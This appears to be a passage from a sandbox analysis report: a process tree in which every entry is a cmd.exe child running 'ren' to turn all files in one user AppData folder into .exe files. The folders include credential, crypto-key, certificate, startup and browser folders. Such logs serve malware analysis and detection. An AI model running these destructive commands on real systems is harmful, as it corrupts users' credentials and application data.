    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\*.*" "*.exe"
        5⤵
        
        PID:1960
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\*.*" "*.exe"
        5⤵
        
        PID:1836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15\*.*" "*.exe"
        5⤵
        
        PID:1568
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16\*.*" "*.exe"
        5⤵
        
        PID:1636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17\*.*" "*.exe"
        5⤵
        
        PID:2004
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18\*.*" "*.exe"
        5⤵
        
        PID:1900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19\*.*" "*.exe"
        5⤵
        
        PID:1144
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2\*.*" "*.exe"
        5⤵
        
        PID:1108
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\*.*" "*.exe"
        5⤵
        
        PID:1080
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21\*.*" "*.exe"
        5⤵
        
        PID:800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22\*.*" "*.exe"
        5⤵
        
        PID:2012
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23\*.*" "*.exe"
        5⤵
        
        PID:1288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24\*.*" "*.exe"
        5⤵
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25\*.*" "*.exe"
        5⤵
        
        PID:1936
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26\*.*" "*.exe"
        5⤵
        
        PID:1100
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27\*.*" "*.exe"
        5⤵
        
        PID:1332
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28\*.*" "*.exe"
        5⤵
        
        PID:1932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29\*.*" "*.exe"
        5⤵
        
        PID:1524
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3\*.*" "*.exe"
        5⤵
        
        PID:924
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\*.*" "*.exe"
        5⤵
        
        PID:1476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31\*.*" "*.exe"
        5⤵
        
        PID:1320
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32\*.*" "*.exe"
        5⤵
        
        PID:1112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33\*.*" "*.exe"
        5⤵
        
        PID:2040
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34\*.*" "*.exe"
        5⤵
        
        PID:880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\*.*" "*.exe"
        5⤵
        
        PID:2008
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36\*.*" "*.exe"
        5⤵
        
        PID:1992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37\*.*" "*.exe"
        5⤵
        
        PID:1944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38\*.*" "*.exe"
        5⤵
        
        PID:304
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39\*.*" "*.exe"
        5⤵
        
        PID:1084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4\*.*" "*.exe"
        5⤵
        
        PID:1720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40\*.*" "*.exe"
        5⤵
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41\*.*" "*.exe"
        5⤵
        
        PID:1212
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42\*.*" "*.exe"
        5⤵
        
        PID:860
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\*.*" "*.exe"
        5⤵
        
        PID:1252
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44\*.*" "*.exe"
        5⤵
        
        PID:1932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45\*.*" "*.exe"
        5⤵
        
        PID:1060
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46\*.*" "*.exe"
        5⤵
        
        PID:1628
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47\*.*" "*.exe"
        5⤵
        
        PID:1636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48\*.*" "*.exe"
        5⤵
        
        PID:1820
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49\*.*" "*.exe"
        5⤵
        
        PID:980
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5\*.*" "*.exe"
        5⤵
        
        PID:1900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50\*.*" "*.exe"
        5⤵
        
        PID:2004
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51\*.*" "*.exe"
        5⤵
        
        PID:2008
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52\*.*" "*.exe"
        5⤵
        
        PID:900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53\*.*" "*.exe"
        5⤵
        
        PID:1996
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54\*.*" "*.exe"
        5⤵
        
        PID:1496
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55\*.*" "*.exe"
        5⤵
        
        PID:1584
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56\*.*" "*.exe"
        5⤵
        
        PID:1152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57\*.*" "*.exe"
        5⤵
        
        PID:1664
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58\*.*" "*.exe"
        5⤵
        
        PID:1100
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59\*.*" "*.exe"
        5⤵
        
        PID:1700
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6\*.*" "*.exe"
        5⤵
        
        PID:364
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60\*.*" "*.exe"
        5⤵
        
        PID:320
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61\*.*" "*.exe"
        5⤵
        
        PID:1560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62\*.*" "*.exe"
        5⤵
        
        PID:1628
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63\*.*" "*.exe"
        5⤵
        
        PID:1132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\*.*" "*.exe"
        5⤵
        
        PID:1824
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8\*.*" "*.exe"
        5⤵
        
        PID:1112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9\*.*" "*.exe"
        5⤵
        
        PID:1144
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host\*.*" "*.exe"
        5⤵
        
        PID:1972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin\*.*" "*.exe"
        5⤵
        
        PID:1508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\*.*" "*.exe"
        5⤵
        
        PID:800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Identities\*.*" "*.exe"
        5⤵
        
        PID:888
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\*.*" "*.exe"
        5⤵
        
        PID:1944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Media Center Programs\*.*" "*.exe"
        5⤵
        
        PID:1720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\*.*" "*.exe"
        5⤵
        
        PID:1096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\*.*" "*.exe"
        5⤵
        
        PID:1664
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\*.*" "*.exe"
        5⤵
        
        PID:1332
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\*.*" "*.exe"
        5⤵
        
        PID:796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\*.*" "*.exe"
        5⤵
        
        PID:1616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\Collab\*.*" "*.exe"
        5⤵
        
        PID:1060
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache\*.*" "*.exe"
        5⤵
        
        PID:1196
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\NativeCache\*.*" "*.exe"
        5⤵
        
        PID:2024
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache\UKMD3L9T\*.*" "*.exe"
        5⤵
        
        PID:1476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Identities\{5E6F8B0F-8B83-449B-BCD7-DDAFF1AFD64E}\*.*" "*.exe"
        5⤵
        
        PID:1004
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\*.*" "*.exe"
        5⤵
        
        PID:744
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\*.*" "*.exe"
        5⤵
        
        PID:1900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\*.*" "*.exe"
        5⤵
        
        PID:776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\F6EGZPG5\*.*" "*.exe"
        5⤵
        
        PID:856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\*.*" "*.exe"
        5⤵
        
        PID:1080
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\*.*" "*.exe"
        5⤵
        
        PID:2032
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\*.*" "*.exe"
        5⤵
        
        PID:1604
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\*.*" "*.exe"
        5⤵
        
        PID:1608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\*.*" "*.exe"
        5⤵
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\*.*" "*.exe"
        5⤵
        
        PID:676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\*.*" "*.exe"
        5⤵
        
        PID:1072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\*.*" "*.exe"
        5⤵
        
        PID:748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\*.*" "*.exe"
        5⤵
        
        PID:324
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\*.*" "*.exe"
        5⤵
        
        PID:1560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1405931862-909307831-4085185274-1000\*.*" "*.exe"
        5⤵
        
        PID:1060
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\*.*" "*.exe"
        5⤵
        
        PID:1132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\*.*" "*.exe"
        5⤵
        
        PID:1552
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\*.*" "*.exe"
        5⤵
        
        PID:1008
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\*.*" "*.exe"
        5⤵
        
        PID:1976
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*.*" "*.exe"
        5⤵
        
        PID:2004
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\*.*" "*.exe"
        5⤵
        
        PID:900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1405931862-909307831-4085185274-1000\*.*" "*.exe"
        5⤵
        
        PID:288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\*.*" "*.exe"
        5⤵
        
        PID:836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*.*" "*.exe"
        5⤵
        
        PID:1288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*.*" "*.exe"
        5⤵
        
        PID:1928
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*.*" "*.exe"
        5⤵
        
        PID:1368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\*.*" "*.exe"
        5⤵
        
        PID:916
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\*.*" "*.exe"
        5⤵
        
        PID:1212
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\*.*" "*.exe"
        5⤵
        
        PID:1660
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\*.*" "*.exe"
        5⤵
        
        PID:1524
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\*.*" "*.exe"
        5⤵
        
        PID:824
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\*.*" "*.exe"
        5⤵
        
        PID:1196
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\*.*" "*.exe"
        5⤵
        
        PID:1880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\*.*" "*.exe"
        5⤵
        
        PID:1132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\*.*" "*.exe"
        5⤵
        
        PID:1792
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\*.*" "*.exe"
        5⤵
        
        PID:1076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\*.*" "*.exe"
        5⤵
        
        PID:1400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\*.*" "*.exe"
        5⤵
        
        PID:776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\*.*" "*.exe"
        5⤵
        
        PID:1764
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\*.*" "*.exe"
        5⤵
        
        PID:856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\*.*" "*.exe"
        5⤵
        
        PID:1892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\*.*" "*.exe"
        5⤵
        
        PID:1496
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\Low\*.*" "*.exe"
        5⤵
        
        PID:1364
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\Low\*.*" "*.exe"
        5⤵
        
        PID:1596
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low\*.*" "*.exe"
        5⤵
        
        PID:576
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\Low\*.*" "*.exe"
        5⤵
        
        PID:1716
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\Low\*.*" "*.exe"
        5⤵
        
        PID:620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\*.*" "*.exe"
        5⤵
        
        PID:1932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\*.*" "*.exe"
        5⤵
        
        PID:1060
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\*.*" "*.exe"
        5⤵
        
        PID:1568
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\*.*" "*.exe"
        5⤵
        
        PID:1560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\*.*" "*.exe"
        5⤵
        
        PID:2040
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\*.*" "*.exe"
        5⤵
        
        PID:1376
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*" "*.exe"
        5⤵
        
        PID:1108
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\*.*" "*.exe"
        5⤵
        
        PID:1176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\*.*" "*.exe"
        5⤵
        
        PID:800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Extensions\*.*" "*.exe"
        5⤵
        
        PID:1968
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\*.*" "*.exe"
        5⤵
        
        PID:888
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\SystemExtensionsDev\*.*" "*.exe"
        5⤵
        
        PID:1892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\*.*" "*.exe"
        5⤵
        
        PID:1156
